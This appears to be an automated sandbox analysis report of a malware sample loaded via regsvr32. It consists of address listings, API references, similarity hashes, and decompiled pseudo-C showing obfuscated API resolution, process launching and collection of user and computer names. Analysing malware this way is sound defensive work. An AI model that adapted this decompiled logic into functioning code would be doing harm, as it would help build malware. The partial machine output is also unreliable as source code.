                                                  0x00c8af6d
                                                  0x00c8af77
                                                  0x00c8af77
                                                  0x00c8af7b
                                                  0x00c8aff9
                                                  0x00c8affc
                                                  0x00c8affe
                                                  0x00c8affe
                                                  0x00c8b005
                                                  0x00c8b007
                                                  0x00c8b011
                                                  0x00c8b014
                                                  0x00c8b017
                                                  0x00c8b017
                                                  0x00000000
                                                  0x00c8af7d
                                                  0x00c8af80
                                                  0x00c8afae
                                                  0x00c8afb8
                                                  0x00c8afbc
                                                  0x00c8afc4
                                                  0x00c8afc7
                                                  0x00c8afce
                                                  0x00c8afd8
                                                  0x00c8afd8
                                                  0x00c8afdc
                                                  0x00c8afe1
                                                  0x00c8aff0
                                                  0x00c8aff6
                                                  0x00c8aff6
                                                  0x00c8afdc
                                                  0x00000000
                                                  0x00c8af87
                                                  0x00c8af8a
                                                  0x00c8af92
                                                  0x00c8afa7
                                                  0x00c8afac
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8afac
                                                  0x00000000
                                                  0x00c8af92
                                                  0x00c8af80
                                                  0x00c8af7b
                                                  0x00c8aec1
                                                  0x00c8aec8
                                                  0x00c8aed8
                                                  0x00c8aee1
                                                  0x00c8aee5
                                                  0x00c8af28
                                                  0x00c8af34
                                                  0x00c8af5d
                                                  0x00c8af36
                                                  0x00c8af3a
                                                  0x00c8af40
                                                  0x00c8af48
                                                  0x00c8af4a
                                                  0x00c8af4d
                                                  0x00c8af53
                                                  0x00c8af55
                                                  0x00c8af55
                                                  0x00c8af48
                                                  0x00c8af3a
                                                  0x00000000
                                                  0x00c8af34
                                                  0x00c8aeed
                                                  0x00c8aef0
                                                  0x00c8aef7
                                                  0x00c8af07
                                                  0x00c8af0a
                                                  0x00c8af1a
                                                  0x00000000
                                                  0x00c8af20
                                                  0x00c8af01
                                                  0x00c8af05
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8af05
                                                  0x00c8aed2
                                                  0x00c8aed6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8aed6
                                                  0x00c8aeaf
                                                  0x00c8aeb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C8AE5E
                                                  • LoadLibraryA.KERNEL32(?), ref: 00C8AEDB
                                                  • GetLastError.KERNEL32 ref: 00C8AEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00C8AF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: 37c80d5ca2966c83b3afe67abe57b4da5ba515a305edc11bae0e4891c399158c
                                                  • Instruction ID: 06ba2f4b3fa117865d764354d5c84f473496e0411a1721f0cc6b274b936e5535
                                                  • Opcode Fuzzy Hash: 37c80d5ca2966c83b3afe67abe57b4da5ba515a305edc11bae0e4891c399158c
                                                  • Instruction Fuzzy Hash: A0813EB1A00605AFEB10DF99D884BAEB7F5FF48314F14802AE615D7250EB70EE45CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8816C, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 27%
                                                  			E00C8816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0xc8d33c; // 0x10a9bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00C870F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xc8c1ac;
				}
				_t46 = E00C88022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00C82049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xc8d27c; // 0x41a5a8
						_t16 = _t75 + 0xc8eb28; // 0x530025
						 *0xc8d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00C870F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xc8c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00C82049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00C89039(_v20);
						} else {
							_t66 =  *0xc8d27c; // 0x41a5a8
							_t31 = _t66 + 0xc8ec48; // 0x73006d
							 *0xc8d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00C89039(_v12);
				}
				return _v24;
			}




























                                                  0x00c88174
                                                  0x00c8817a
                                                  0x00c88181
                                                  0x00c88187
                                                  0x00c8818b
                                                  0x00c8818f
                                                  0x00c88192
                                                  0x00c88199
                                                  0x00c8819c
                                                  0x00c8819e
                                                  0x00c8819e
                                                  0x00c881a7
                                                  0x00c881ae
                                                  0x00c881b1
                                                  0x00c881b7
                                                  0x00c881c1
                                                  0x00c881ca
                                                  0x00c881d1
                                                  0x00c881ea
                                                  0x00c881f1
                                                  0x00c881f4
                                                  0x00c881fd
                                                  0x00c88206
                                                  0x00c88217
                                                  0x00c88220
                                                  0x00c88224
                                                  0x00c88228
                                                  0x00c8822f
                                                  0x00c88232
                                                  0x00c88234
                                                  0x00c88234
                                                  0x00c8823e
                                                  0x00c88247
                                                  0x00c8824e
                                                  0x00c88266
                                                  0x00c8826a
                                                  0x00c882a7
                                                  0x00c8826c
                                                  0x00c8826f
                                                  0x00c88277
                                                  0x00c88288
                                                  0x00c88294
                                                  0x00c8829c
                                                  0x00c882a0
                                                  0x00c882a0
                                                  0x00c8826a
                                                  0x00c882af
                                                  0x00c882b4
                                                  0x00c882bb

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00C88181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 00C881C1
                                                  • lstrlen.KERNEL32(00000000), ref: 00C881CA
                                                  • lstrlen.KERNEL32(00000000), ref: 00C881D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 00C881DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 00C8823E
                                                  • lstrlen.KERNEL32(?), ref: 00C88247
                                                  • lstrlen.KERNEL32(?), ref: 00C8824E
                                                  • lstrlenW.KERNEL32(?), ref: 00C88255
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: bf95da90320db3bc11760dd07feea4307e5676f446679e71fdcbdc0b3869cebc
                                                  • Instruction ID: 06288756c9413af609bddcbcfa2e2ba91c36b10ca4bde044e3f006251e650b4d
                                                  • Opcode Fuzzy Hash: bf95da90320db3bc11760dd07feea4307e5676f446679e71fdcbdc0b3869cebc
                                                  • Instruction Fuzzy Hash: 32416972800219EFCF11BFA4CC49A9EBBB5EF48358F154061FD04A7261DB359A15EFA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8205E, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E00C8205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00C8692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00C8A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xc8d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xc8d27c; // 0x41a5a8
					_t18 = _t47 + 0xc8e3e6; // 0x73797325
					_t68 = E00C895B1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xc8d27c; // 0x41a5a8
						_t19 = _t50 + 0xc8e747; // 0x10a8cef
						_t20 = _t50 + 0xc8e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00C884D5();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00C884D5();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xc8d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00C89039(_t70);
				goto L12;
			}


















                                                  0x00c82066
                                                  0x00c82066
                                                  0x00c82075
                                                  0x00c8207e
                                                  0x00c82081
                                                  0x00c8218e
                                                  0x00c82195
                                                  0x00c82195
                                                  0x00c82090
                                                  0x00c82098
                                                  0x00c8209d
                                                  0x00c820a0
                                                  0x00c820b5
                                                  0x00c820bb
                                                  0x00c820bc
                                                  0x00c820bf
                                                  0x00c820c5
                                                  0x00c820c8
                                                  0x00c820cd
                                                  0x00c820d5
                                                  0x00c820e1
                                                  0x00c820e5
                                                  0x00c82175
                                                  0x00c820eb
                                                  0x00c820eb
                                                  0x00c820f0
                                                  0x00c820f7
                                                  0x00c8210b
                                                  0x00c8210f
                                                  0x00c8215e
                                                  0x00c82111
                                                  0x00c82112
                                                  0x00c82119
                                                  0x00c82132
                                                  0x00c82134
                                                  0x00c82138
                                                  0x00c8213f
                                                  0x00c82159
                                                  0x00c82141
                                                  0x00c8214a
                                                  0x00c8214f
                                                  0x00c8214f
                                                  0x00c8213f
                                                  0x00c8216d
                                                  0x00c8216d
                                                  0x00c820e5
                                                  0x00c8217c
                                                  0x00c82185
                                                  0x00c82189
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00C8692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00C8207A,?,00000001,?,?,00000000,00000000), ref: 00C86951
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C86973
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C86989
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C8699F
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C869B5
                                                    • Part of subcall function 00C8692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C869CB
                                                  • memset.NTDLL ref: 00C820C8
                                                    • Part of subcall function 00C895B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00C823E9,63699BCE,00C81354,73797325), ref: 00C895C2
                                                    • Part of subcall function 00C895B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00C895DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,010A8CEF,73797325), ref: 00C820FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00C82105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C8216D
                                                    • Part of subcall function 00C884D5: GetProcAddress.KERNEL32(36776F57,00C821E5), ref: 00C884F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 00C8214A
                                                  • CloseHandle.KERNEL32(?), ref: 00C8214F
                                                  • GetLastError.KERNEL32(00000001), ref: 00C82153
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: 5ecfa1b3baf965cd6f2310b6631b321fe381dea58af56ef12b9c7e5271e765c3
                                                  • Instruction ID: 47c8b7a92416b3c11e8db0cccfbd2f5a77920f0058cb0a49ad0fc616c93f6c68
                                                  • Opcode Fuzzy Hash: 5ecfa1b3baf965cd6f2310b6631b321fe381dea58af56ef12b9c7e5271e765c3
                                                  • Instruction Fuzzy Hash: CD314FB2800209FFDB10AFA4DC89EAFBBBCEB08358F104465F615A7161D7349E45DB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C88307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E00C88307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xc8d27c; // 0x41a5a8
				_t1 = _t9 + 0xc8e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E00C89401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E00C82049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E00C87225(_t34, _t41, _a8);
						E00C89039(_t41);
						_t42 = E00C88E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00C89039(_t36);
							_t36 = _t42;
						}
						_t43 = E00C8788B(_t36, _t33);
						if(_t43 != 0) {
							E00C89039(_t36);
							_t36 = _t43;
						}
					}
					E00C89039(_t28);
				}
				return _t36;
			}














                                                  0x00c88307
                                                  0x00c8830a
                                                  0x00c8830b
                                                  0x00c88313
                                                  0x00c8831a
                                                  0x00c88321
                                                  0x00c88325
                                                  0x00c8832b
                                                  0x00c88332
                                                  0x00c88337
                                                  0x00c88349
                                                  0x00c8834d
                                                  0x00c88351
                                                  0x00c88357
                                                  0x00c8835c
                                                  0x00c8836c
                                                  0x00c8836e
                                                  0x00c88385
                                                  0x00c88389
                                                  0x00c8838c
                                                  0x00c88391
                                                  0x00c88391
                                                  0x00c8839a
                                                  0x00c8839e
                                                  0x00c883a1
                                                  0x00c883a6
                                                  0x00c883a6
                                                  0x00c8839e
                                                  0x00c883a9
                                                  0x00c883a9
                                                  0x00c883b4

                                                  APIs
                                                    • Part of subcall function 00C89401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,00C88321,253D7325,00000000,00000000,74ECC740,?,?,00C8A428,?), ref: 00C89468
                                                    • Part of subcall function 00C89401: sprintf.NTDLL ref: 00C89489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C8A428,?,010A95B0), ref: 00C88332
                                                  • lstrlen.KERNEL32(?,?,?,00C8A428,?,010A95B0), ref: 00C8833A
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • strcpy.NTDLL ref: 00C88351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00C8835C
                                                    • Part of subcall function 00C87225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00C8836B,00000000,?,?,?,00C8A428,?,010A95B0), ref: 00C8723C
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C8A428,?,010A95B0), ref: 00C88379
                                                    • Part of subcall function 00C88E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00C88385,00000000,?,?,00C8A428,?,010A95B0), ref: 00C88E8C
                                                    • Part of subcall function 00C88E82: _snprintf.NTDLL ref: 00C88EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: b647955194ee5e1ecdaea1f79f2303ae65a95885f06b625211f68f0f5cea07d3
                                                  • Instruction ID: 70040767ad6c6ff7287632f5e3cdb2a0df7139d55dc8c0af109ae3c9ea948961
                                                  • Opcode Fuzzy Hash: b647955194ee5e1ecdaea1f79f2303ae65a95885f06b625211f68f0f5cea07d3
                                                  • Instruction Fuzzy Hash: 2B11E333500624BB46227BF5AC85D7F269D9F897A83090026F504A7111DF39CE0277A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C86CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C86D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 00C86D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00C86D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C86DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C86DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C86DC3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 8051d4ea26d02412c71e93518f0706597d6fd1272b23db52640f7bfd44e4098e
                                                  • Instruction ID: 9fa83286e5231fb21c63dc8355031c94867cfa581ecdf03ed3b127ea05f52838
                                                  • Opcode Fuzzy Hash: 8051d4ea26d02412c71e93518f0706597d6fd1272b23db52640f7bfd44e4098e
                                                  • Instruction Fuzzy Hash: 65314E32D00609ABDF01EFB8C844A9EB7BAAF49315F144465ED15EB220DB719E06CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8692C, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C8692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00C82049(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xc8d27c; // 0x41a5a8
					_t1 = _t23 + 0xc8e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xc8d27c; // 0x41a5a8
					_t2 = _t26 + 0xc8e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00C89039(_t54);
					} else {
						_t30 =  *0xc8d27c; // 0x41a5a8
						_t5 = _t30 + 0xc8e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xc8d27c; // 0x41a5a8
							_t7 = _t33 + 0xc8e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xc8d27c; // 0x41a5a8
								_t9 = _t36 + 0xc8e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xc8d27c; // 0x41a5a8
									_t11 = _t39 + 0xc8e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00C8727B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                  0x00c8693b
                                                  0x00c8693f
                                                  0x00c86a01
                                                  0x00c86945
                                                  0x00c86945
                                                  0x00c8694a
                                                  0x00c8695d
                                                  0x00c8695f
                                                  0x00c86964
                                                  0x00c8696c
                                                  0x00c86973
                                                  0x00c86977
                                                  0x00c8697a
                                                  0x00c869f9
                                                  0x00c869fa
                                                  0x00c8697c
                                                  0x00c8697c
                                                  0x00c86981
                                                  0x00c86989
                                                  0x00c8698d
                                                  0x00c86990
                                                  0x00000000
                                                  0x00c86992
                                                  0x00c86992
                                                  0x00c86997
                                                  0x00c8699f
                                                  0x00c869a3
                                                  0x00c869a6
                                                  0x00000000
                                                  0x00c869a8
                                                  0x00c869a8
                                                  0x00c869ad
                                                  0x00c869b5
                                                  0x00c869b9
                                                  0x00c869bc
                                                  0x00000000
                                                  0x00c869be
                                                  0x00c869be
                                                  0x00c869c3
                                                  0x00c869cb
                                                  0x00c869cf
                                                  0x00c869d2
                                                  0x00000000
                                                  0x00c869d4
                                                  0x00c869da
                                                  0x00c869df
                                                  0x00c869e6
                                                  0x00c869ed
                                                  0x00c869f0
                                                  0x00000000
                                                  0x00c869f2
                                                  0x00c869f5
                                                  0x00c869f5
                                                  0x00c869f0
                                                  0x00c869d2
                                                  0x00c869bc
                                                  0x00c869a6
                                                  0x00c86990
                                                  0x00c8697a
                                                  0x00c86a0f

                                                  APIs
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00C8207A,?,00000001,?,?,00000000,00000000), ref: 00C86951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00C86973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00C86989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00C8699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00C869B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00C869CB
                                                    • Part of subcall function 00C8727B: memset.NTDLL ref: 00C872FA
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 38b8339b8bac95b1ad44d1e861b19f2330de311b6c7af264e5d51d52e87b87b2
                                                  • Instruction ID: 5b2d450b3c41f6ad616da01147dd4a2cf7575ffb6830b9c95f7e6e6a4c546e43
                                                  • Opcode Fuzzy Hash: 38b8339b8bac95b1ad44d1e861b19f2330de311b6c7af264e5d51d52e87b87b2
                                                  • Instruction Fuzzy Hash: CD215EB160120ADFDB20EFA9DC84F6A77ECEB083487014169F655D7251D734EE009F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C87649, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C87649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E00C82049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E00C89039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xc8a33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
